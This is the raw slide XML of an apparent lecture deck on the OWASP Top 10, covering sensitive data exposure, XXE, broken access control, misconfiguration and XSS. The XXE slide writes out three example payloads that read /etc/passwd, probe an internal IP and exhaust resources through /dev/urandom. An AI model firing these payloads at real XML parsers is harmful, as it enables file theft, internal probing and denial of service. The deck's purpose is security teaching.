              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>insufficient key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>randomness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)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9785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90"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sensitive data exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166789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9785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90"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A4: XML External Entity (XXE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00009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Common problem where web application processes input or uploads in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XML format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>XML: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>eXtensible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Markup Language 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Particularly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>SOAP (simple object access protocol) web services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="105000"/>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-1" charset="-128"/>
              </a:rPr>
              <a:t>XML uploaded to a web app may include a Document Type Definition (DTD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="105000"/>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-1" charset="-128"/>
              </a:rPr>
              <a:t>If the XML parser has DTD processing enabled, this can allow the attacker to carry out a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-1" charset="-128"/>
              </a:rPr>
              <a:t>wide range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-1" charset="-128"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-1" charset="-128"/>
              </a:rPr>
              <a:t>attacks, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="105000"/>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Internal file disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="105000"/>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Internal port scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="105000"/>
              <a:buFont typeface="Times New Roman" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Denial of service attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295545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9785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800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML External Entity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Examples (OWASP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8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0200" y="1257300"/>
            <a:ext cx="8902700" cy="5435600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="10500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Internal file disclosure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r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>?xml version="1.0"&gt; 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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY &gt;&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>SYSTEM "file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&gt;]&gt; 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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>;&lt;/foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&gt;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endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Menlo Bold"/>
              <a:cs typeface="Menlo Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="10500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Internal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network probing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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0"&gt; 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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t> S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>YSTEM "https://192.168.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>/" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&gt;]&gt; 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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>;&lt;/foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&gt;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endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Menlo Bold"/>
              <a:cs typeface="Menlo Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="105000"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Denial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service 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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0"&gt; 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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY &gt;&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>SYSTEM "file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>urandom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&gt;]&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="88900" lvl="1" indent="0" defTabSz="533400">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="105000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Menlo Bold"/>
                <a:cs typeface="Menlo Bold"/>
              </a:rPr>
              <a:t>;&lt;/foo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="10500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lvl="1" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="105000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean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800" b="1" i="1" dirty="0" smtClean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800" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean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800" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>urandom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1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smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>is a Linux virtual device file that streams out an endless stream of random bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i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6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97850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0090"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>A5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Broken access control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6246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Lack of function level access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Allowing insecure privileged access e.g. by browsing to “secret” URL for admin functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Need proper access control model defining how access to web app resources are granted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" sz="20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Insecure direct object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>When parameter in form data or URL is directly mapped to a resource), for example a file, a database table or field name, a user or a role.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Basic insecure example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
                <a:cs typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
              </a:rPr>
              <a:t>http://viewmybalance.com/view.html?account=12345678</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Reference maps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>provide indirect object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>e.g. random string mapped to file/object name </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188983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58800" y="0"/>
            <a:ext cx="8245475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0090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill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60500"/>
            <a:ext cx="8223250" cy="4864100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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Open Web Application Security Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="22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Global community of web app security professionals</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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They produce:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Best practice guides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> detailed documents and "cheat sheets"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>A standard for application security verifications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2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GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Open-source software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>: deliberately vulnerable web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ZAP (Zed Attack Proxy): penetration testing tool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32191685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Typical issues:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Unnecessary features enabled (ports, services, pages, accounts, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Default accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Error handling too informative (e.g. revealing stack traces or DB table/field names)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Server directory listing not disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Software not patched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9785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90"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security misconfiguration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310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19785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90"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A7: Cross Site Scripting (XSS)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Attacker injects scripting code into pages generated by a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Script could be malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Often JavaScript. May </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>alternatively be HTML, Flash or anything else handled by the browser.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Threats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Phishing, hijacking, changing of user settings, cookie theft/poisoning, false advertising, execution of code on the client, ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1649566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XSS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306513"/>
            <a:ext cx="8437563" cy="41624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2000" dirty="0"/>
              <a:t>Any web page containing user-created content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>may be target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>for XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Risk with comments, reviews, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>guestbooks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>, webmail, social media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
